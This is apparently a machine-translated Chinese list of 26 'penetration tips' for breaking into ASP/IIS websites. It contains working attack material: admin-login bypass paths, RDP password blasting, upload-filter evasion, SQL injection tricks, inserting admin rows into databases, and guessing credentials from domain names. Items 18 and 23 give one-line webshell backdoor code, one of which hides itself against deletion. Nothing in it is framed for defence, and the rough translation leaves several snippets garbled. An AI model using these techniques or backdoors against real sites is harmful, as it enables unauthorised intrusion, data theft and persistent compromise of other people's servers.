Website personal penetration Skills Collection and summary

1. Use website filtering to bypass background verification directly, add admin/session.asp or admin/left.asp after the website

2. Some websites in the background will appear a script prompt box, enter: Administrator can break! Admin means to enter as an administrator.

3. Some Web sites opened 3389, before the invasion to connect 3389, try weak password or blasting, and the other is to press 5 times SHIFT key, to see if there is no predecessor installed the back door, and then social worker password.

4. Sometimes in the background will pop up the prompt box "Please login", the address copied out (copy not), and then placed in the Web Source Code Analyzer, select Browser-intercept jump tick-check to enter the background!

5. Break through the anti-theft chain access Webshell, code:

Javascript:document.write ("<a href= ' http://www.xxx.com/uploadfile/1.asp ' >fuck</a>")

　

Enter Webshell by clicking Go when you enter

6. Breaking through the first-class information monitoring interception system access, when the pony can access, upload big horse but not, you can first with the big horse with a picture merge, after uploading the merged pictures, then the database backup after access!

7. When taking the editor shell, sometimes added asp|asa|cer|php|aspx and other extensions are filtered, in fact, as long as the increase AASPSP upload ASP will break through.

8. Sometimes ah D guess out of the table, but can not guess the field, the background to view the source files, search ID or type, generally can be found, and then D to add a field to guess the content can be broken.

9. Social Work backstage password can use this technique, if website domain name is: Exehack.net administrator name is admin, can try password "exehack" and "exehack.net" to login.

10. When manually injected, if the site filters and 1=1 and 1=2, the XOR 1=1 XOR 1=2 can be used to judge.

11. Local construction Upload a word trojan, if prompted "Please select the file you want to upload!" [Re-upload] ", the file is too small, with Notepad open and then copy more words to enlarge the file size, and then upload.

12. Use AH D stopwatch, run field name name and pass out, show the length of more than 50 what, guess the case, then put in the pangolin to run generally can run out!

13. Guess the administrator backstage tips, admin/left.asp, admin/main.asp, admin/top.asp, admin/admin.asp will show menu navigation, and then thunder download all links.

14. Know the table name, field, and use the SQL statement to add a username and password statement to the Access database:

Insert into admin (user,pwd) VALUES (' Test ', ' test ')

15. When the administrator password, but not the administrator's account, to the front desk casually open a news, find such as "Submitter", "publisher" and other words, the general "submitter" is the administrator's account.

16. Blasting Asp+iis set up the Web site absolute path, assuming that the site home page is: http://www.xxxxx/index.asp/submit http://www.xxxxx.cn/fkbhvv.aspx/, The fkbhvv.aspx is not there.

17. The use of the source code, a lot of Web sites are used to download the source code, some webmasters are lazy, and do not change, and then upload the website, we can go to download a set, there are a lot of default information is worth using.

18. Upload the following code to Webshell, the suffix is ASP, even if others found that also can not delete, is a super anti-deletion of a word trojan, it is safe to leave a backdoor, chopper connection password: X

<%Eval(Request (chr)): Set Fso=createobject ("Scripting.FileSystemObject"): Set F=FSO. GetFile (Request.ServerVariables ("path_translated")):if  f.attributes <> then:f.attributes = 39 :Endif%>

19. When the password is cracked out of the background, you can try to link ftp, if the domain name is: www.baidu.com "get the password for" Bishi ", we can try to use" xxxx "" xxxx.cn "www.xxxx.cn as the FTP user name, with" Bishi ": As the FTP password to log on, the odds of success can be very big oh! Default port for ftp: 21 default account password: Test

20. Some backstage does not show the verification code, can't you log in? In fact, a piece of code into the registration table can break through this dilemma, the following code to save as Code.reg, double-click on the import can be!

Regedit4[hkey_local_machine\software\microsoft\internet explorer\security] "BLOCKXBM" =dword:00000000

21. When the website is not allowed to upload ASP, ASA, PHP and other files, we can upload an STM file, the code is:

"<!--#include file=" conn.asp "--"

(To see what files to write what file name, here I pretend to view "conn.asp"),
Then open the address of the STM file directly, and then look at the source code, "conn.asp" The code of this file is in view!

22. When the website is not allowed to upload files of asp,cgi,cer,cdx,htr and other types, try uploading a shtm file with the content:

<!--#includ file= "conn.asp"-

　　

If the upload is successful, that's great, access to the address can browse the contents of the conn.asp, so that the database path will be the hand!

23. Manually detect the injection point popup "Your operation has been recorded!" Information such as access to this file: sqlin.asp, if present, insert a word trojan behind the injection point:
' Excute (Request ("TNT"))
Then use a word Trojan Client connection: http://www.xxx.com/sqlin.asp, upload Trojan can win shell, because many anti-injection programs are used "sqlin.asp" This file name to do illegal records of the database.

24. Side note, it must be the support of the ASPX site to Japan, the question is how to judge it? The method is simple, add xxx.aspx after the site, if return "/" in the application of the server error, unable to find the resource, 404 screen is the support ASPX Trojan.

25. Add test.php to view the version after the website

26. Taboo These two websites background files admin_index.asp manage_login.asp

Website personal penetration Skills collection and summary